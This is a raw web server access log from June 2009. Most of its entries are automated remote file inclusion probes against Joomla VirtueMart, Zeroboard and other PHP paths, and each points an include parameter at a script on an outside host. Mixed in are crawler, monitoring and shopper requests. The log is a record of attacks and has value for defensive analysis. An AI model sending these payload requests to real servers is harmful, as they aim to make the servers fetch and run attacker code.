123.143.98.5 - - [20/Jun/2009:05:17:37 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.243.139.4 - - [20/Jun/2009:05:17:42 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [20/Jun/2009:05:17:42 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [20/Jun/2009:05:17:42 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
123.143.98.5 - - [20/Jun/2009:05:17:54 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:17:57 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:17:57 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 248 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:17:57 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 253 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:18:01 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:18:01 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:18:01 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
201.232.54.48 - - [20/Jun/2009:05:18:09 -0400] "GET /logs/access_log.Q109051300///?_zb_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
201.232.54.48 - - [20/Jun/2009:05:18:09 -0400] "GET ///?_zb_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
201.232.54.48 - - [20/Jun/2009:05:18:10 -0400] "GET /logs///?_zb_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 200 6248 "-" "libwww-perl/5.805"
85.17.162.28 - - [20/Jun/2009:05:18:10 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:18:13 -0400] "GET /logs/access_log.Q109051000%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:18:13 -0400] "GET /logs/access_log.Q109051100%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:18:20 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 248 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:18:20 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:18:20 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 253 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:18:23 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:18:23 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:18:23 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:18:32 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:18:36 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)"
209.59.12.99 - - [20/Jun/2009:05:18:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [20/Jun/2009:05:19:07 -0400] "GET /logs/access_log.Q109061200%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:19:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B81488E82120036EF04U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [20/Jun/2009:05:19:23 -0400] "GET /logs/access_log.Q109061200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:19:23 -0400] "GET /logs/access_log.Q109061200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:19:28 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:19:28 -0400] "GET /logs/access_log.Q109060400%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:19:28 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:20:22 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:20:29 -0400] "GET /logs/access_log.Q109060400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:20:29 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 248 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:20:29 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 253 "-" "Mozilla/4.61 [en] (OS/2; U)"
82.194.87.219 - - [20/Jun/2009:05:20:32 -0400] "GET /logs///errors.php?error=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 215 "-" "libwww-perl/5.822"
85.17.162.28 - - [20/Jun/2009:05:20:33 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:20:33 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:20:33 -0400] "GET /logs/access_log.Q109060400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
201.232.54.48 - - [20/Jun/2009:05:20:49 -0400] "GET /logs/access_log.Q109051800///?_zb_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
66.249.71.54 - - [20/Jun/2009:05:20:58 -0400] "GET /images/nav_store_cart_orng.jpg HTTP/1.1" 200 1298 "-" "Googlebot-Image/1.0"
66.249.71.14 - - [20/Jun/2009:05:20:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B82479CC2C600531F071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.80.195.55 - - [20/Jun/2009:05:21:07 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {3B50D54F-C060-4680-BDD5-D5EEA29D736B})"
58.227.193.198 - - [20/Jun/2009:05:21:08 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
58.227.193.198 - - [20/Jun/2009:05:21:08 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
58.227.193.198 - - [20/Jun/2009:05:21:08 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
193.243.139.4 - - [20/Jun/2009:05:21:09 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
193.243.139.4 - - [20/Jun/2009:05:21:09 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [20/Jun/2009:05:21:09 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [20/Jun/2009:05:21:14 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [20/Jun/2009:05:21:14 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [20/Jun/2009:05:21:14 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
85.17.162.28 - - [20/Jun/2009:05:21:24 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
195.207.160.102 - - [20/Jun/2009:05:21:42 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.207.160.102 - - [20/Jun/2009:05:21:42 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.207.160.102 - - [20/Jun/2009:05:21:42 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jun/2009:05:21:45 -0400] "GET ///?_zb_path=http://kudacuki.ucoz.com/id_superscan.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
85.17.162.28 - - [20/Jun/2009:05:22:05 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)"
193.243.139.4 - - [20/Jun/2009:05:22:05 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [20/Jun/2009:05:22:05 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
193.243.139.4 - - [20/Jun/2009:05:22:05 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
58.227.193.198 - - [20/Jun/2009:05:22:06 -0400] "GET /logs/access_log.Q109060100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
195.207.160.102 - - [20/Jun/2009:05:22:35 -0400] "GET /logs/access_log.Q109060100//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:22:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B824F83320200F96F04V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.243.139.4 - - [20/Jun/2009:05:22:47 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
85.17.162.28 - - [20/Jun/2009:05:23:17 -0400] "GET //functions.inc.php?REX[INCLUDE_PATH]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:23:17 -0400] "GET /logs/access_log.Q109053100//functions.inc.php?REX[INCLUDE_PATH]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:23:17 -0400] "GET /logs//functions.inc.php?REX[INCLUDE_PATH]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:23:41 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 246 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:23:41 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 219 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:23:41 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 224 "-" "Mozilla/4.61 [en] (OS/2; U)"
209.59.12.99 - - [20/Jun/2009:05:23:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [20/Jun/2009:05:24:16 -0400] "GET /logs/access_log.Q109053100%20%20//functions.inc.php?REX[INCLUDE_PATH]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:24:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8BD27200450F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [20/Jun/2009:05:24:23 -0400] "GET /logs/access_log.Q109052600%20%20//functions.inc.php?REX[INCLUDE_PATH]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:24:24 -0400] "GET /logs/access_log.Q109060200//include/mail.inc.php?skin_board_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 246 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:25:28 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:25:28 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:25:28 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:25:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8C226200460F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [20/Jun/2009:05:26:28 -0400] "GET /logs/access_log.Q109053100//functions.inc.php?REX[INCLUDE_PATH]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 243 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:26:37 -0400] "GET /logs/access_log.Q109053100//functions.inc.php?REX[INCLUDE_PATH]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:26:37 -0400] "GET /logs//functions.inc.php?REX[INCLUDE_PATH]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:26:37 -0400] "GET //functions.inc.php?REX[INCLUDE_PATH]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:26:38 -0400] "GET //functions.inc.php?REX[INCLUDE_PATH]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 216 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:26:38 -0400] "GET /logs//functions.inc.php?REX[INCLUDE_PATH]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 221 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:26:39 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.239.227.229 - - [20/Jun/2009:05:26:44 -0400] "GET /logs/access_log.Q109060400///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
222.239.227.229 - - [20/Jun/2009:05:26:45 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
85.17.162.28 - - [20/Jun/2009:05:26:45 -0400] "GET /logs/access_log.Q109052600//functions.inc.php?REX[INCLUDE_PATH]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 243 "-" "Mozilla/4.61 [en] (OS/2; U)"
222.239.227.229 - - [20/Jun/2009:05:26:45 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 200 6248 "-" "libwww-perl/5.79"
222.239.227.229 - - [20/Jun/2009:05:26:47 -0400] "GET /logs/access_log.Q109060400///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
222.239.227.229 - - [20/Jun/2009:05:26:48 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
222.239.227.229 - - [20/Jun/2009:05:26:48 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 200 6248 "-" "libwww-perl/5.79"
193.243.139.4 - - [20/Jun/2009:05:26:58 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
85.17.162.28 - - [20/Jun/2009:05:27:06 -0400] "GET /logs/access_log.Q109052600//functions.inc.php?REX[INCLUDE_PATH]=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:27:14 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:27:14 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:27:14 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
193.243.139.4 - - [20/Jun/2009:05:27:15 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
66.249.71.14 - - [20/Jun/2009:05:27:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B81488E32820035EF04U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.238.86.212 - - [20/Jun/2009:05:27:20 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
88.238.86.212 - - [20/Jun/2009:05:27:20 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
88.238.86.212 - - [20/Jun/2009:05:27:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
88.238.86.212 - - [20/Jun/2009:05:27:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
74.55.29.146 - - [20/Jun/2009:05:27:27 -0400] "GET //?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:05:27:27 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:05:27:27 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 200 6247 "-" "Mozilla/5.0"
88.238.86.212 - - [20/Jun/2009:05:27:30 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0039435 HTTP/1.1" 200 45273 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
88.238.86.212 - - [20/Jun/2009:05:27:32 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0039435" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
